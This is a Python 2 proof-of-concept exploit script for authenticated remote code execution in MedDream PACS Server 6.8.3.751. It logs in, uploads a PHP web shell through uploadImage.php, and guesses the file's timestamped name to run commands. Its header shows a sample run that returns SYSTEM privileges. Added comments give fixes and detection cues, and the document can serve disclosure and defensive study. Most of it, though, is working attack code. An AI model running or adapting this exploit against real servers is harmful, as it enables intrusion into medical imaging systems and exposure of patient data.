#!/usr/bin/python
#
#
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
# Date: 2020-10-01
# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
# Vendor Homepage: https://www.softneta.com
# Version: 6.8.3.751
# Tested On: Windows 2016
#
#
# Timeline
# 05-02-20: Submitted incident through email, immediate response
# 05-04-20: Issue resolved, New version released 6.8.3.1.751
#
# Note: Core Vulnerability resides in another product which has been remediated as well
#
##PoC##
#
# 1. create one line php shell to call commands
# 2. run script on attacking machine
# 3. enter parameters; IP, filename, username, password, command
#
#
# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter Username: user1
# Enter Password: SoSecure!!
# Enter command: whoami
# 212357
# <pre>nt authority\system
# </pre>
# http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#
"""Proof of concept for an authenticated arbitrary-file upload leading to RCE.

What the requests below (and the sample run in the header) show about the
vulnerable application:

* ``/Pacs/uploadImage.php`` accepts a multipart upload whose filename and
  declared content type come from the client (``application/x-php`` here)
  and stores it under the web-served ``/Pacs/upload/`` directory with the
  original extension intact -- the sample run gets HTTP 200 and command
  output back from the stored ``.php`` file.
* The stored name is predictable, ``<YYYYMMDD>-<HHMMSS>--<original name>``,
  so the script only has to try a few timestamps around the upload time.

Defensive notes. The fix belongs on the server: allow-list upload extensions
and content, store uploads outside the document root (or with script
execution disabled for that directory), and give stored files non-guessable
names. Detection opportunities that follow directly from this script: a POST
to ``uploadImage.php`` carrying a ``.php`` part, then GET requests to
``/Pacs/upload/*.php`` with a query string and a burst of 404s for
consecutive-second filenames. Per the header, the vendor's remediated build
is 6.8.3.1.751.

This is Python 2 code (``raw_input``, ``urllib2``, ``print`` statements).
"""

from urllib2 import urlopen
from bs4 import BeautifulSoup
import requests
import sys
import time
from datetime import datetime, timedelta

# Interactive parameters; the password is echoed by raw_input, so this
# PoC is not suitable for unattended use.
ip_addr = raw_input("Enter IP Address: ")
user_file = raw_input("Enter payload filename + .php: ")
uname = raw_input("Enter Username: ")
pword = raw_input("Enter Password: ")
cmd = raw_input("Enter command: ")

# Plain HTTP endpoints of the PACS web front end: login page, login
# handler, and the upload handler that accepts the attachment.
URL1= 'http://' + ip_addr + '/Pacs/login.php'
URL2= 'http://' + ip_addr + '/Pacs/authenticate.php'
URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php'

def main():
    """Log in, upload the user-supplied PHP file, then probe for its stored URL.

    Reads the module-level inputs (``ip_addr``, ``user_file``, ``uname``,
    ``pword``, ``cmd``) and the ``URL*`` constants. Prints the local
    ``HHMMSS`` used as the first filename guess, then, for each candidate
    URL, the response body and URL on HTTP 200 or the literal string
    ``"404"`` for any other status (the string is printed regardless of the
    actual non-200 code). Returns ``None``.

    Raises whatever ``requests`` / ``bs4`` raise on network or parse
    failure; a missing ``formAntiSpam`` or ``aetitle`` input on the login
    page raises ``TypeError`` from indexing ``None``.
    """
    session = requests.Session()
    # The login form carries a hidden anti-automation token and the
    # database/AE title; both are scraped and replayed in the POST.
    site = session.get(URL1)
    soup = BeautifulSoup(site.content, "html.parser")
    antispam = soup.find("input", {"name":"formAntiSpam"})["value"]
    dbname = soup.find("input", {"name":"aetitle"})["value"]
    login_data = {
        'loginvalue': 'login',
        'aetitle': dbname,
        'username': uname,
        'password': pword,
        'formAntispam': antispam,
        'login': 'Login',
    }
    # Login result is not checked; a failed login simply leads to an
    # unauthenticated upload attempt and 404s below.
    r = session.post(URL2, data = login_data)
    # Multipart "Attach" upload. The server-side weakness demonstrated here
    # is that the client-chosen filename/extension and content type are
    # accepted as-is. The file handle opened here is never closed.
    files = [
        ('actionvalue', (None, 'Attach', None)),
        ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
        ('action', (None, 'Attach', None)),
    ]
    r = session.post(URL3, files=files)
    # The stored filename embeds the server-side upload date and time; the
    # local clock is used as an estimate, so the attacker host and the
    # server must agree on date and roughly on seconds for this to succeed.
    today = datetime.today()
    upload_date = today.strftime("%Y%m%d")
    less = 1
    now1 = datetime.now()
    up_time1 = now1.strftime("%H%M%S")
    print(up_time1)
    #varying time checks +/-
    # Candidate HHMMSS values at one-second offsets around now1, to absorb
    # clock skew and request latency.
    now2 = now1 - timedelta(seconds=less)
    up_time2 = now2.strftime("%H%M%S")
    now3 = now2 - timedelta(seconds=less)
    up_time3 = now3.strftime("%H%M%S")
    now4 = now3 - timedelta(seconds=less)
    up_time4 = now4.strftime("%H%M%S")
    now5 = now4 - timedelta(seconds=less)
    up_time5 = now5.strftime("%H%M%S")
    now6 = now5 - timedelta(seconds=less)
    up_time6 = now6.strftime("%H%M%S")
    now7 = now6 - timedelta(seconds=less)
    up_time7 = now7.strftime("%H%M%S")
    now8 = now1 + timedelta(seconds=less)
    up_time8 = now8.strftime("%H%M%S")
    now9 = now8 + timedelta(seconds=less)
    up_time9 = now8.strftime("%H%M%S")
    now10 = now1 + timedelta(seconds=less)
    up_time10 = now9.strftime("%H%M%S")
    up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]
    # Probe each guessed path. From the defender's side this is the
    # distinctive footprint: a run of GETs to /Pacs/upload/<date>-<time>--
    # <name>.php?cmd=... within a couple of seconds, most of them 404.
    # The command is appended to the URL unencoded.
    for i in up_time_array:
        r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
        if r.status_code == 200:
            print r.content
            print r.url
        else:
            print ("404")

if __name__ == '__main__':
    main()